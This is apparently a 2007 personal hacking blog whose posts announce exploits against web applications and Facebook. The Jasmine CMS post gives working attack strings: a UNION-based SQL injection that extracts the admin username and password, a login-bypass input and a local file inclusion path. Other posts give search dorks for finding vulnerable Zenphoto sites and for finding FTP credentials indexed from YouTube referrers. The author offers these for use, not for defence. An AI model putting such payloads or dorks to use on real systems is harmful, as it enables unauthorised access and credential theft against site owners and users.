Monday, 31 December 2007

Zenphoto 1.1.3 SQL Injection Exploit

Hey Guys,

Been out of action for a while. Was a bit bored at work today so i decided to break something...and so i did.

This is a SQL Injection exploit that'll retrieve the admin username and password. Currently this script only work's on v 1.1.3 BUT the vulnerability exists in 1.1 - 1.1.3, just can't be bothered to script it as they seem to have a different schema every time they release a new version.

The script is buggered as i can't be bothered to add all the table prefix stuff etc. You can easily change the table prefix though.

"Powered by zenphoto"
"Powered by zenphoto" +rss


Thursday, 1 November 2007

Facebook XSS Vulnerability

Hey Peepz,

So, browsing away on Facebook the other week, then i wondered if Facebook was as riddled with holes like MySpace was a while back. It seems not...but still has a few ;)

Anyways, I don't need to explain to you the possibilities of what you can do with XSS and a social networking website so I'll just give you the vulnerability.


I heard Facebook were pretty swift with their patches, let's put that to the test...clock's ticking.


Fixed as of 05/11/07

Tuesday, 19 June 2007

Google indexes FTP Credentials from YouTube...How Ironic!

Lyecdevf (a member of the w4ck1ng community) recently started a thread on how Google indexes plain-text FTP credentials of YouTube users.

In his own words:

"This is basically a google dork. What basically happens is that if someone is logged in to his/her FTP account and checks a page which embeds a YouTube video through the FTP client, YouTube will register that as a hit from "username:password@domain.tld", simply put.

Which means that you are going to get his login information to his FTP server. Enjoy! "clicks from ftp @""

Which is a pretty cool find. But does anybody see the irony in this? I certainly do!

Original Thread:

Multiple Vulnerabilities In Jasmine CMS 1.0

Multiple Vulnerabilities In Jasmine CMS 1.0


If your thinking about installing this appauling CMS, please think again! The developer clearly has no regard for the integrity of the information being used by the app. To list all the possible vulnerablities would just be silly so i'll list one of every attack type:

SQL Injection:

news.php?item=-999 UNION SELECT 0,password,0,0,0,0,username FROM user WHERE id=1/*

Admin Login Bypass:

Username = ' UNION SELECT id,username,email,signature,avatar_path,joined,total_visits,status FROM user WHERE id = '1'/*

Password = Anything or Nothing

Local File Inclusion:

admin/plugin_manager.php?u=[PATH TO LOCAL FILE]%00

...and i'm pretty sure there are tons of XSS vulns in here too.


Monday, 18 June 2007

First post, but someone took my site!

So i finally decided to get with the times and start up my own weblog. I don't usually conform to online trends like MySpace, Facebook & blogs in general. That doesn't mean i don't like visiting other peoples'...just don't like playing along.

So there's me thinking i'm gonna have a nice blog url to give people ( no, someone already took that about 5 years ago and decided not to use it! Oh well, geuss i'll have to make do with the one i've got.

This blog will be more or less a place for me to release my exploits but more of a place to ramble on about the actual vulnerability. Also to just air my views on general information security issues and whatnot.

I hope you enjoy it!